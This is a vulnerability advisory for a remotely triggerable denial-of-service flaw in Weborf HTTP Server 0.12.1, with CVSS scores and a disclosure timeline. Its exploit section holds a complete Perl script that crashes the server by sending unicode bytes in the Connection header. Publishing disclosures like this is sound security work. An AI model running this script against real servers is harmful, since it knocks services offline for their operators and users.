weborf_http_server 0.12.1 Vulnerability Report

2010.06.27
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

[DCA-0012] [Software] - Weborf HTTP Server [Vendor Product Description] - Weborf is a lightweight Web server written in C. It supports IPv6 and basic authentication. It doesn't implement the full HTTP specification, but can be used to easily share directories or files. [Bug Description] - Weborf HTTP Server can't handle unicode characters in "Connection: " general header-field leading to a Denial-of-Service flaw [History] - Advisory sent to vendor on 06/21/2010. - Vendor reply 06/22/2010. - Vendor patch published 06/23/2010 [Impact] - Low [Affected Version] -Weborf 0.12.1 - Prior versions may also be vulnerable. [Exploit] #!/usr/bin/perl use IO::Socket; if (@ARGV < 1) { usage(); } $ip = $ARGV[0]; $port = $ARGV[1]; print "[+] Sending request...\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n"; print $socket "GET / HTTP/1.0\r\n"; print $socket "Connection: ". "\0x99" x 4 ."\r\n\r\n"; close($socket); print "[+] Done!\n"; sub usage() { print "[-] Usage: <". $0 ."> <host> <port>\n"; print "[-] Example: ". $0 ." 127.0.0.1 80\n"; exit; } ------------------------------------------------------------------------ ---------------- DcLabs Security Group Sponsor: ipax ipax (at) dclabs.com (dot) br [email concealed] [Credits] Crash and all DcLabs members.

References:

http://www.securityfocus.com/bid/41064
http://www.securityfocus.com/archive/1/archive/1/511953/100/0/threaded
http://secunia.com/advisories/40322
http://freshmeat.net/projects/weborf/releases/318531


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top